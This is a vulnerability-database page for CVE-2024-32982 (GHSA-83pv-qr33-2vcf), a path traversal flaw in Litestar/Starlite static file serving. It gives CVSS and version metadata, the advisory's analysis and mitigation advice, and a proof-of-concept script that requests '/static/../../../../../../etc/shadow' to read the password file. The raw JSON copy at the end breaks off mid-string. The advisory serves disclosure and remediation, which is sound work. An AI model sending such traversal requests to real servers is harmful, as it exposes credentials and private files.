CVE-2024-32982 (GCVE-0-2024-32982)

Vulnerability from cvelistv5 – Published: 2024-05-06 14:38 – Updated: 2024-08-02 02:27

Summary

Litestar and Starlite is an Asynchronous Server Gateway Interface (ASGI) framework. Prior to 2.8.3, 2.7.2, and 2.6.4, a Local File Inclusion (LFI) vulnerability has been discovered in the static file serving component of LiteStar. This vulnerability allows attackers to exploit path traversal flaws, enabling unauthorized access to sensitive files outside the designated directories. Such access can lead to the disclosure of sensitive information or potentially compromise the server. The vulnerability is located in the file path handling mechanism within the static content serving function, specifically at `litestar/static_files/base.py`. This vulnerability is fixed in versions 2.8.3, 2.7.2, and 2.6.4.

Severity ?

8.2 (High)


                        
                          CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N

CWE

CWE-22 - Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')

Assigner

GitHub_M

References

URL

Tags

	https://github.com/litestar-org/litestar/security…	x_refsource_CONFIRM
	https://github.com/litestar-org/litestar/commit/5…	x_refsource_MISC
	https://github.com/litestar-org/litestar/blob/mai…	x_refsource_MISC

Impacted products

	Vendor	Product	Version
	litestar-org	litestar	Affected: >= 2.8.0, < 2.8.3 Affected: >= 1.37.0, <= 1.51.14 Affected: >= 2.7.0, < 2.7.2 Affected: >= 2.0.0, < 2.6.4

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "affected": [
          {
            "cpes": [
              "cpe:2.3:a:starliteproject:starlite:1.37.0:*:*:*:*:*:*:*"
            ],
            "defaultStatus": "unknown",
            "product": "starlite",
            "vendor": "starliteproject",
            "versions": [
              {
                "lessThanOrEqual": "1.51.14",
                "status": "affected",
                "version": "1.37.0",
                "versionType": "custom"
              }
            ]
          },
          {
            "cpes": [
              "cpe:2.3:a:starliteproject:starlite:2.0.0:*:*:*:*:*:*:*"
            ],
            "defaultStatus": "unknown",
            "product": "starlite",
            "vendor": "starliteproject",
            "versions": [
              {
                "lessThan": "2.6.4",
                "status": "affected",
                "version": "2.0.0",
                "versionType": "custom"
              }
            ]
          },
          {
            "cpes": [
              "cpe:2.3:a:starliteproject:starlite:2.7.0:*:*:*:*:*:*:*"
            ],
            "defaultStatus": "unknown",
            "product": "starlite",
            "vendor": "starliteproject",
            "versions": [
              {
                "lessThan": "2.7.2",
                "status": "affected",
                "version": "2.7.0",
                "versionType": "custom"
              }
            ]
          },
          {
            "cpes": [
              "cpe:2.3:a:starliteproject:starlite:2.8.0:*:*:*:*:*:*:*"
            ],
            "defaultStatus": "unknown",
            "product": "starlite",
            "vendor": "starliteproject",
            "versions": [
              {
                "lessThan": "2.8.3",
                "status": "affected",
                "version": "2.8.0",
                "versionType": "custom"
              }
            ]
          }
        ],
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-32982",
                "options": [
                  {
                    "Exploitation": "poc"
                  },
                  {
                    "Automatable": "yes"
                  },
                  {
                    "Technical Impact": "total"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-07-03T14:26:20.026909Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-07-03T20:55:45.126Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      },
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-02T02:27:53.331Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "name": "https://github.com/litestar-org/litestar/security/advisories/GHSA-83pv-qr33-2vcf",
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "https://github.com/litestar-org/litestar/security/advisories/GHSA-83pv-qr33-2vcf"
          },
          {
            "name": "https://github.com/litestar-org/litestar/commit/57e706e7effdc182fc9a2af5981bc88afb21851b",
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "https://github.com/litestar-org/litestar/commit/57e706e7effdc182fc9a2af5981bc88afb21851b"
          },
          {
            "name": "https://github.com/litestar-org/litestar/blob/main/litestar/static_files/base.py#L70",
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "https://github.com/litestar-org/litestar/blob/main/litestar/static_files/base.py#L70"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "litestar",
          "vendor": "litestar-org",
          "versions": [
            {
              "status": "affected",
              "version": "\u003e= 2.8.0, \u003c 2.8.3"
            },
            {
              "status": "affected",
              "version": "\u003e= 1.37.0, \u003c= 1.51.14"
            },
            {
              "status": "affected",
              "version": "\u003e= 2.7.0, \u003c 2.7.2"
            },
            {
              "status": "affected",
              "version": "\u003e= 2.0.0, \u003c 2.6.4"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "Litestar and Starlite is an Asynchronous Server Gateway Interface (ASGI) framework. Prior to 2.8.3, 2.7.2, and 2.6.4, a Local File Inclusion (LFI) vulnerability has been discovered in the static file serving component of LiteStar. This vulnerability allows attackers to exploit path traversal flaws, enabling unauthorized access to sensitive files outside the designated directories. Such access can lead to the disclosure of sensitive information or potentially compromise the server. The vulnerability is located in the file path handling mechanism within the static content serving function, specifically at `litestar/static_files/base.py`. This vulnerability is fixed in versions 2.8.3, 2.7.2, and 2.6.4."
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "NONE",
            "baseScore": 8.2,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "LOW",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N",
            "version": "3.1"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-22",
              "description": "CWE-22: Improper Limitation of a Pathname to a Restricted Directory (\u0027Path Traversal\u0027)",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2024-05-06T20:50:00.744Z",
        "orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
        "shortName": "GitHub_M"
      },
      "references": [
        {
          "name": "https://github.com/litestar-org/litestar/security/advisories/GHSA-83pv-qr33-2vcf",
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://github.com/litestar-org/litestar/security/advisories/GHSA-83pv-qr33-2vcf"
        },
        {
          "name": "https://github.com/litestar-org/litestar/commit/57e706e7effdc182fc9a2af5981bc88afb21851b",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/litestar-org/litestar/commit/57e706e7effdc182fc9a2af5981bc88afb21851b"
        },
        {
          "name": "https://github.com/litestar-org/litestar/blob/main/litestar/static_files/base.py#L70",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/litestar-org/litestar/blob/main/litestar/static_files/base.py#L70"
        }
      ],
      "source": {
        "advisory": "GHSA-83pv-qr33-2vcf",
        "discovery": "UNKNOWN"
      },
      "title": "Litestar and Starlite affected by Improper Limitation of a Pathname to a Restricted Directory (\u0027Path Traversal\u0027)"
    }
  },
  "cveMetadata": {
    "assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
    "assignerShortName": "GitHub_M",
    "cveId": "CVE-2024-32982",
    "datePublished": "2024-05-06T14:38:10.875Z",
    "dateReserved": "2024-04-22T15:14:59.167Z",
    "dateUpdated": "2024-08-02T02:27:53.331Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1",
  "vulnerability-lookup:meta": {
    "fkie_nvd": {
      "descriptions": "[{\"lang\": \"en\", \"value\": \"Litestar and Starlite is an Asynchronous Server Gateway Interface (ASGI) framework. Prior to 2.8.3, 2.7.2, and 2.6.4, a Local File Inclusion (LFI) vulnerability has been discovered in the static file serving component of LiteStar. This vulnerability allows attackers to exploit path traversal flaws, enabling unauthorized access to sensitive files outside the designated directories. Such access can lead to the disclosure of sensitive information or potentially compromise the server. The vulnerability is located in the file path handling mechanism within the static content serving function, specifically at `litestar/static_files/base.py`. This vulnerability is fixed in versions 2.8.3, 2.7.2, and 2.6.4.\"}, {\"lang\": \"es\", \"value\": \"Litestar y Starlite es un framework de interfaz de puerta de enlace de servidor as\\u00edncrono (ASGI). Antes de las versiones 2.8.3, 2.7.2 y 2.6.4, se descubri\\u00f3 una vulnerabilidad de inclusi\\u00f3n de archivos locales (LFI) en el componente de servicio de archivos est\\u00e1ticos de LiteStar. Esta vulnerabilidad permite a los atacantes explotar fallas de path traversal, permitiendo el acceso no autorizado a archivos confidenciales fuera de los directorios designados. Dicho acceso puede dar lugar a la divulgaci\\u00f3n de informaci\\u00f3n confidencial o potencialmente comprometer el servidor. La vulnerabilidad se encuentra en el mecanismo de manejo de rutas de archivos dentro de la funci\\u00f3n de servicio de contenido est\\u00e1tico, espec\\u00edficamente en `litestar/static_files/base.py`. Esta vulnerabilidad se solucion\\u00f3 en las versiones 2.8.3, 2.7.2 y 2.6.4.\"}]",
      "id": "CVE-2024-32982",
      "lastModified": "2024-11-21T09:16:09.857",
      "metrics": "{\"cvssMetricV31\": [{\"source\": \"security-advisories@github.com\", \"type\": \"Secondary\", \"cvssData\": {\"version\": \"3.1\", \"vectorString\": \"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N\", \"baseScore\": 8.2, \"baseSeverity\": \"HIGH\", \"attackVector\": \"NETWORK\", \"attackComplexity\": \"LOW\", \"privilegesRequired\": \"NONE\", \"userInteraction\": \"NONE\", \"scope\": \"UNCHANGED\", \"confidentialityImpact\": \"HIGH\", \"integrityImpact\": \"LOW\", \"availabilityImpact\": \"NONE\"}, \"exploitabilityScore\": 3.9, \"impactScore\": 4.2}]}",
      "published": "2024-05-06T15:15:23.330",
      "references": "[{\"url\": \"https://github.com/litestar-org/litestar/blob/main/litestar/static_files/base.py#L70\", \"source\": \"security-advisories@github.com\"}, {\"url\": \"https://github.com/litestar-org/litestar/commit/57e706e7effdc182fc9a2af5981bc88afb21851b\", \"source\": \"security-advisories@github.com\"}, {\"url\": \"https://github.com/litestar-org/litestar/security/advisories/GHSA-83pv-qr33-2vcf\", \"source\": \"security-advisories@github.com\"}, {\"url\": \"https://github.com/litestar-org/litestar/blob/main/litestar/static_files/base.py#L70\", \"source\": \"af854a3a-2127-422b-91ae-364da2661108\"}, {\"url\": \"https://github.com/litestar-org/litestar/commit/57e706e7effdc182fc9a2af5981bc88afb21851b\", \"source\": \"af854a3a-2127-422b-91ae-364da2661108\"}, {\"url\": \"https://github.com/litestar-org/litestar/security/advisories/GHSA-83pv-qr33-2vcf\", \"source\": \"af854a3a-2127-422b-91ae-364da2661108\"}]",
      "sourceIdentifier": "security-advisories@github.com",
      "vulnStatus": "Awaiting Analysis",
      "weaknesses": "[{\"source\": \"security-advisories@github.com\", \"type\": \"Secondary\", \"description\": [{\"lang\": \"en\", \"value\": \"CWE-22\"}]}]"
    },
    "nvd": "{\"cve\":{\"id\":\"CVE-2024-32982\",\"sourceIdentifier\":\"security-advisories@github.com\",\"published\":\"2024-05-06T15:15:23.330\",\"lastModified\":\"2024-11-21T09:16:09.857\",\"vulnStatus\":\"Awaiting Analysis\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"Litestar and Starlite is an Asynchronous Server Gateway Interface (ASGI) framework. Prior to 2.8.3, 2.7.2, and 2.6.4, a Local File Inclusion (LFI) vulnerability has been discovered in the static file serving component of LiteStar. This vulnerability allows attackers to exploit path traversal flaws, enabling unauthorized access to sensitive files outside the designated directories. Such access can lead to the disclosure of sensitive information or potentially compromise the server. The vulnerability is located in the file path handling mechanism within the static content serving function, specifically at `litestar/static_files/base.py`. This vulnerability is fixed in versions 2.8.3, 2.7.2, and 2.6.4.\"},{\"lang\":\"es\",\"value\":\"Litestar y Starlite es un framework de interfaz de puerta de enlace de servidor as\u00edncrono (ASGI). Antes de las versiones 2.8.3, 2.7.2 y 2.6.4, se descubri\u00f3 una vulnerabilidad de inclusi\u00f3n de archivos locales (LFI) en el componente de servicio de archivos est\u00e1ticos de LiteStar. Esta vulnerabilidad permite a los atacantes explotar fallas de path traversal, permitiendo el acceso no autorizado a archivos confidenciales fuera de los directorios designados. Dicho acceso puede dar lugar a la divulgaci\u00f3n de informaci\u00f3n confidencial o potencialmente comprometer el servidor. La vulnerabilidad se encuentra en el mecanismo de manejo de rutas de archivos dentro de la funci\u00f3n de servicio de contenido est\u00e1tico, espec\u00edficamente en `litestar/static_files/base.py`. Esta vulnerabilidad se solucion\u00f3 en las versiones 2.8.3, 2.7.2 y 2.6.4.\"}],\"metrics\":{\"cvssMetricV31\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N\",\"baseScore\":8.2,\"baseSeverity\":\"HIGH\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"NONE\",\"userInteraction\":\"NONE\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"HIGH\",\"integrityImpact\":\"LOW\",\"availabilityImpact\":\"NONE\"},\"exploitabilityScore\":3.9,\"impactScore\":4.2}]},\"weaknesses\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-22\"}]}],\"references\":[{\"url\":\"https://github.com/litestar-org/litestar/blob/main/litestar/static_files/base.py#L70\",\"source\":\"security-advisories@github.com\"},{\"url\":\"https://github.com/litestar-org/litestar/commit/57e706e7effdc182fc9a2af5981bc88afb21851b\",\"source\":\"security-advisories@github.com\"},{\"url\":\"https://github.com/litestar-org/litestar/security/advisories/GHSA-83pv-qr33-2vcf\",\"source\":\"security-advisories@github.com\"},{\"url\":\"https://github.com/litestar-org/litestar/blob/main/litestar/static_files/base.py#L70\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\"},{\"url\":\"https://github.com/litestar-org/litestar/commit/57e706e7effdc182fc9a2af5981bc88afb21851b\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\"},{\"url\":\"https://github.com/litestar-org/litestar/security/advisories/GHSA-83pv-qr33-2vcf\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\"}]}}",
    "vulnrichment": {
      "containers": "{\"adp\": [{\"title\": \"CVE Program Container\", \"references\": [{\"url\": \"https://github.com/litestar-org/litestar/security/advisories/GHSA-83pv-qr33-2vcf\", \"name\": \"https://github.com/litestar-org/litestar/security/advisories/GHSA-83pv-qr33-2vcf\", \"tags\": [\"x_refsource_CONFIRM\", \"x_transferred\"]}, {\"url\": \"https://github.com/litestar-org/litestar/commit/57e706e7effdc182fc9a2af5981bc88afb21851b\", \"name\": \"https://github.com/litestar-org/litestar/commit/57e706e7effdc182fc9a2af5981bc88afb21851b\", \"tags\": [\"x_refsource_MISC\", \"x_transferred\"]}, {\"url\": \"https://github.com/litestar-org/litestar/blob/main/litestar/static_files/base.py#L70\", \"name\": \"https://github.com/litestar-org/litestar/blob/main/litestar/static_files/base.py#L70\", \"tags\": [\"x_refsource_MISC\", \"x_transferred\"]}], \"providerMetadata\": {\"orgId\": \"af854a3a-2127-422b-91ae-364da2661108\", \"shortName\": \"CVE\", \"dateUpdated\": \"2024-08-02T02:27:53.331Z\"}}, {\"title\": \"CISA ADP Vulnrichment\", \"metrics\": [{\"other\": {\"type\": \"ssvc\", \"content\": {\"id\": \"CVE-2024-32982\", \"role\": \"CISA Coordinator\", \"options\": [{\"Exploitation\": \"poc\"}, {\"Automatable\": \"yes\"}, {\"Technical Impact\": \"total\"}], \"version\": \"2.0.3\", \"timestamp\": \"2024-07-03T14:26:20.026909Z\"}}}], \"affected\": [{\"cpes\": [\"cpe:2.3:a:starliteproject:starlite:1.37.0:*:*:*:*:*:*:*\"], \"vendor\": \"starliteproject\", \"product\": \"starlite\", \"versions\": [{\"status\": \"affected\", \"version\": \"1.37.0\", \"versionType\": \"custom\", \"lessThanOrEqual\": \"1.51.14\"}], \"defaultStatus\": \"unknown\"}, {\"cpes\": [\"cpe:2.3:a:starliteproject:starlite:2.0.0:*:*:*:*:*:*:*\"], \"vendor\": \"starliteproject\", \"product\": \"starlite\", \"versions\": [{\"status\": \"affected\", \"version\": \"2.0.0\", \"lessThan\": \"2.6.4\", \"versionType\": \"custom\"}], \"defaultStatus\": \"unknown\"}, {\"cpes\": [\"cpe:2.3:a:starliteproject:starlite:2.7.0:*:*:*:*:*:*:*\"], \"vendor\": \"starliteproject\", \"product\": \"starlite\", \"versions\": [{\"status\": \"affected\", \"version\": \"2.7.0\", \"lessThan\": \"2.7.2\", \"versionType\": \"custom\"}], \"defaultStatus\": \"unknown\"}, {\"cpes\": [\"cpe:2.3:a:starliteproject:starlite:2.8.0:*:*:*:*:*:*:*\"], \"vendor\": \"starliteproject\", \"product\": \"starlite\", \"versions\": [{\"status\": \"affected\", \"version\": \"2.8.0\", \"lessThan\": \"2.8.3\", \"versionType\": \"custom\"}], \"defaultStatus\": \"unknown\"}], \"providerMetadata\": {\"orgId\": \"134c704f-9b21-4f2e-91b3-4a467353bcc0\", \"shortName\": \"CISA-ADP\", \"dateUpdated\": \"2024-07-03T14:39:49.299Z\"}}], \"cna\": {\"title\": \"Litestar and Starlite affected by Improper Limitation of a Pathname to a Restricted Directory (\u0027Path Traversal\u0027)\", \"source\": {\"advisory\": \"GHSA-83pv-qr33-2vcf\", \"discovery\": \"UNKNOWN\"}, \"metrics\": [{\"cvssV3_1\": {\"scope\": \"UNCHANGED\", \"version\": \"3.1\", \"baseScore\": 8.2, \"attackVector\": \"NETWORK\", \"baseSeverity\": \"HIGH\", \"vectorString\": \"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N\", \"integrityImpact\": \"LOW\", \"userInteraction\": \"NONE\", \"attackComplexity\": \"LOW\", \"availabilityImpact\": \"NONE\", \"privilegesRequired\": \"NONE\", \"confidentialityImpact\": \"HIGH\"}}], \"affected\": [{\"vendor\": \"litestar-org\", \"product\": \"litestar\", \"versions\": [{\"status\": \"affected\", \"version\": \"\u003e= 2.8.0, \u003c 2.8.3\"}, {\"status\": \"affected\", \"version\": \"\u003e= 1.37.0, \u003c= 1.51.14\"}, {\"status\": \"affected\", \"version\": \"\u003e= 2.7.0, \u003c 2.7.2\"}, {\"status\": \"affected\", \"version\": \"\u003e= 2.0.0, \u003c 2.6.4\"}]}], \"references\": [{\"url\": \"https://github.com/litestar-org/litestar/security/advisories/GHSA-83pv-qr33-2vcf\", \"name\": \"https://github.com/litestar-org/litestar/security/advisories/GHSA-83pv-qr33-2vcf\", \"tags\": [\"x_refsource_CONFIRM\"]}, {\"url\": \"https://github.com/litestar-org/litestar/commit/57e706e7effdc182fc9a2af5981bc88afb21851b\", \"name\": \"https://github.com/litestar-org/litestar/commit/57e706e7effdc182fc9a2af5981bc88afb21851b\", \"tags\": [\"x_refsource_MISC\"]}, {\"url\": \"https://github.com/litestar-org/litestar/blob/main/litestar/static_files/base.py#L70\", \"name\": \"https://github.com/litestar-org/litestar/blob/main/litestar/static_files/base.py#L70\", \"tags\": [\"x_refsource_MISC\"]}], \"descriptions\": [{\"lang\": \"en\", \"value\": \"Litestar and Starlite is an Asynchronous Server Gateway Interface (ASGI) framework. Prior to 2.8.3, 2.7.2, and 2.6.4, a Local File Inclusion (LFI) vulnerability has been discovered in the static file serving component of LiteStar. This vulnerability allows attackers to exploit path traversal flaws, enabling unauthorized access to sensitive files outside the designated directories. Such access can lead to the disclosure of sensitive information or potentially compromise the server. The vulnerability is located in the file path handling mechanism within the static content serving function, specifically at `litestar/static_files/base.py`. This vulnerability is fixed in versions 2.8.3, 2.7.2, and 2.6.4.\"}], \"problemTypes\": [{\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-22\", \"description\": \"CWE-22: Improper Limitation of a Pathname to a Restricted Directory (\u0027Path Traversal\u0027)\"}]}], \"providerMetadata\": {\"orgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"shortName\": \"GitHub_M\", \"dateUpdated\": \"2024-05-06T20:50:00.744Z\"}}}",
      "cveMetadata": "{\"cveId\": \"CVE-2024-32982\", \"state\": \"PUBLISHED\", \"dateUpdated\": \"2024-08-02T02:27:53.331Z\", \"dateReserved\": \"2024-04-22T15:14:59.167Z\", \"assignerOrgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"datePublished\": \"2024-05-06T14:38:10.875Z\", \"assignerShortName\": \"GitHub_M\"}",
      "dataType": "CVE_RECORD",
      "dataVersion": "5.1"
    }
  }
}

GHSA-83PV-QR33-2VCF

Vulnerability from github – Published: 2024-05-06 14:20 – Updated: 2024-07-08 18:47

Summary

Litestar and Starlite vulnerable to Path Traversal

Details

Summary

Local File Inclusion via Path Traversal in LiteStar Static File Serving

A Local File Inclusion (LFI) vulnerability has been discovered in the static file serving component of LiteStar. This vulnerability allows attackers to exploit path traversal flaws, enabling unauthorized access to sensitive files outside the designated directories. Such access can lead to the disclosure of sensitive information or potentially compromise the server.

Details

The vulnerability is located in the file path handling mechanism within the static content serving function, specifically at line 70 in litestar/static_files/base.py.

The function fails to properly validate the destination file path derived from user input, thereby permitting directory traversal. The critical code segment is as follows:

commonpath([str(directory), file_info["name"], joined_path])

Given the variables:

directory = PosixPath('/Users/brian/sandbox/test_vuln/static')
file_info["name"] = '/Users/brian/sandbox/test_vuln/static/../requirements.txt'
joined_path = PosixPath('/Users/brian/sandbox/test_vuln/static/../requirements.txt')

The function outputs '/Users/brian/sandbox/test_vuln/static', incorrectly assuming it is confined to the static directory. This incorrect validation facilitates directory traversal, exposing the system to potential unauthorized access and manipulation.

Proof of Concept (PoC)

To reproduce this vulnerability, follow these steps:

Set up the environment:
Install with pip the uvicorn and litestar packages.
Create a static folder in the root directory of your project and place any file (e.g., an image) in it for testing.
Ensure the static file serving is enabled, which is typically the default configuration.
Preparation of the testing environment:
If using Ubuntu or a similar system, you can use /etc/shadow which contains sensitive password information. If not, create a dummy sensitive file outside the static directory for testing.
Create a main.py file with the following content to configure and run the LiteStar server:

```python from pathlib import Path from litestar import Litestar from litestar.static_files import create_static_files_router import uvicorn

app = Litestar( route_handlers=[ create_static_files_router(path="/static", directories=["static"]), ], )

if name == "main": uvicorn.run("main:app", host="0.0.0.0", port=8000) ```
Run this script with the command python3 main.py to start the server.
Exploit:
Prepare an exploit script named exploit.py with the following Python code to perform the HTTP request without client-side sanitization:

```python import http.client

def send_request(host, port, path): connection = http.client.HTTPConnection(host, port) connection.request("GET", path) response = connection.getresponse() print(f"Status: {response.status}") print(f"Headers: {response.getheaders()}") data = response.read() print(f"Body: {data.decode('utf-8')}") connection.close()

send_request("localhost", 8000, "/static/../../../../../../etc/shadow") ```
Execute this script using python3 exploit.py. This script uses direct HTTP connections to bypass client-side path sanitization present in tools like curl or web browsers.
Observe:
The server should respond with the contents of the /etc/shadow file, thereby confirming the path traversal vulnerability.
The output will display the status, headers, and body of the response, which should contain the contents of the sensitive file.

Impact

This Local File Inclusion vulnerability critically affects all instances of LiteStar where the server has been configured to serve static files. By exploiting this vulnerability, unauthorized attackers can gain read access to any file that the server process has permission to access. Here are the specific impacts:

Exposure of Sensitive Information:
The ability to traverse the file system can lead to the exposure of highly sensitive information. This includes system configuration files, application logs, or scripts containing credentials or cryptographic keys. Such information can provide attackers with deeper insights into the system architecture or facilitate further attacks.
Potential for System Compromise:
If sensitive system or application configuration files are exposed, attackers might be able to use this information to manipulate system behavior or escalate their privileges. For instance, accessing a .env file might reveal environment variables used for application configurations that include database passwords or API keys.
Credential Leakage:
Access to files such as /etc/passwd or /etc/shadow (on Unix-like systems) could expose user credentials, which might be leveraged to perform further attacks, such as brute force attacks on user accounts or using stolen credentials to access other systems where the same credentials are reused.
Regulatory and Compliance Violations:
Unauthorized access to personally identifiable information (PII), payment data, or health records could result in breaches of data protection regulations such as GDPR, HIPAA, or PCI DSS. This could not only damage the reputation of the organization but also lead to heavy fines and legal action.
Loss of Trust and Reputation Damage:
Security incidents, particularly those involving the loss of sensitive data, can significantly damage an organization's reputation. Customers and partners may lose trust, which can impact the business both immediately and in the long term.
Potential for Further Exploitation:
The initial read access gained through this vulnerability might be used as a stepping stone for more severe attacks. For example, if application source code is accessed, it could be analyzed for further vulnerabilities that might lead to direct exploitation, such as remote code execution.

Here's the revised Mitigation Suggestion section for your vulnerability report, focusing on items 1 and 2, and including a reference to a similar implementation in another project:

Mitigation Suggestion

To effectively address the Local File Inclusion vulnerability via path traversal identified in the LiteStar application, it is essential to implement robust input validation and sanitization mechanisms. Below are specific strategies focused on managing user inputs and ensuring secure file path handling:

Input Validation and Sanitization:
Implement rigorous validation of all user-supplied input, particularly file path inputs. This should include sanitizing the input to remove or neutralize potentially harmful characters and sequences such as ../ which are used in path traversal attacks.
Use regular expressions to validate file paths against a strict pattern that only matches expected and safe input.
Path Normalization:
Normalize file paths before using them in file operations. Functions such as os.path.normpath() in Python can be used to normalize paths. This method resolves redundant separators and up-level references (../) to prevent directory traversal.
As a reference, consider the approach taken by the Starlette framework in their static file serving feature, where path validation is performed to ensure the requested path remains within the intended directory. For example, see how Starlette handles this with a security check: python if os.path.commonpath([full_path, directory]) != directory: # Don't allow misbehaving clients to break out of the static files # directory. continue This snippet from Starlette's implementation ensures that the constructed file path does not traverse out of the specified directory.

Comments

Naming Convention: - From versions 0.X.X through 1.X.X, the package was released under the name "starlite." - Starting with version 2.0.0 and for all subsequent versions, the package has been rebranded and released under the name "litestar."

Feature Additions and Changes: - Static Files Support: Introduced in version 0.6.0, adding the capability to serve static files directly from the package. - Path Validation Update: In version 1.37.0, Starlite modified its approach to validating paths within the static directory. Prior to this version, path validation was managed using the Starlette framework.

Severity ?

8.2 (High)


                  
                    CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N

Show details on source website

JSON

To clipboard

{
  "affected": [
    {
      "package": {
        "ecosystem": "PyPI",
        "name": "litestar"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "2.8.0"
            },
            {
              "fixed": "2.8.3"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "PyPI",
        "name": "starlite"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "1.37.0"
            },
            {
              "fixed": "1.51.16"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "PyPI",
        "name": "litestar"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "2.7.0"
            },
            {
              "fixed": "2.7.2"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "PyPI",
        "name": "litestar"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "2.0.0"
            },
            {
              "fixed": "2.6.4"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2024-32982"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-22"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2024-05-06T14:20:50Z",
    "nvd_published_at": "2024-05-06T15:15:23Z",
    "severity": "HIGH"
  },
  "details": "# Summary\n**Local File Inclusion via Path Traversal in LiteStar Static File Serving**\n\nA Local File Inclusion (LFI) vulnerability has been discovered in the static file serving component of [LiteStar](https://github.com/litestar-org/litestar). This vulnerability allows attackers to exploit path traversal flaws, enabling unauthorized access to sensitive files outside the designated directories. Such access can lead to the disclosure of sensitive information or potentially compromise the server.\n\n## Details\nThe vulnerability is located in the file path handling mechanism within the static content serving function, specifically at [line 70 in `litestar/static_files/base.py`](https://github.com/litestar-org/litestar/blob/main/litestar/static_files/base.py#L70).\n\nThe function fails to properly validate the destination file path derived from user input, thereby permitting directory traversal. The critical code segment is as follows:\n\n```python\ncommonpath([str(directory), file_info[\"name\"], joined_path])\n```\n\nGiven the variables:\n```python\ndirectory = PosixPath(\u0027/Users/brian/sandbox/test_vuln/static\u0027)\nfile_info[\"name\"] = \u0027/Users/brian/sandbox/test_vuln/static/../requirements.txt\u0027\njoined_path = PosixPath(\u0027/Users/brian/sandbox/test_vuln/static/../requirements.txt\u0027)\n```\n\nThe function outputs \u0027/Users/brian/sandbox/test_vuln/static\u0027, incorrectly assuming it is confined to the static directory. This incorrect validation facilitates directory traversal, exposing the system to potential unauthorized access and manipulation.\n\n\n## Proof of Concept (PoC)\nTo reproduce this vulnerability, follow these steps:\n\n1. **Set up the environment:**\n   - Install with pip the `uvicorn` and `litestar` packages.\n   - Create a `static` folder in the root directory of your project and place any file (e.g., an image) in it for testing.\n   - Ensure the static file serving is enabled, which is typically the default configuration.\n\n2. **Preparation of the testing environment:**\n   - If using Ubuntu or a similar system, you can use `/etc/shadow` which contains sensitive password information. If not, create a dummy sensitive file outside the static directory for testing.\n   - Create a `main.py` file with the following content to configure and run the LiteStar server:\n\n    ```python\n    from pathlib import Path\n    from litestar import Litestar\n    from litestar.static_files import create_static_files_router\n    import uvicorn\n\n    app = Litestar(\n        route_handlers=[\n            create_static_files_router(path=\"/static\", directories=[\"static\"]),\n        ],\n    )\n\n    if __name__ == \"__main__\":\n        uvicorn.run(\"main:app\", host=\"0.0.0.0\", port=8000)\n    ```\n\n   - Run this script with the command `python3 main.py` to start the server.\n\n3. **Exploit:**\n   - Prepare an exploit script named `exploit.py` with the following Python code to perform the HTTP request without client-side 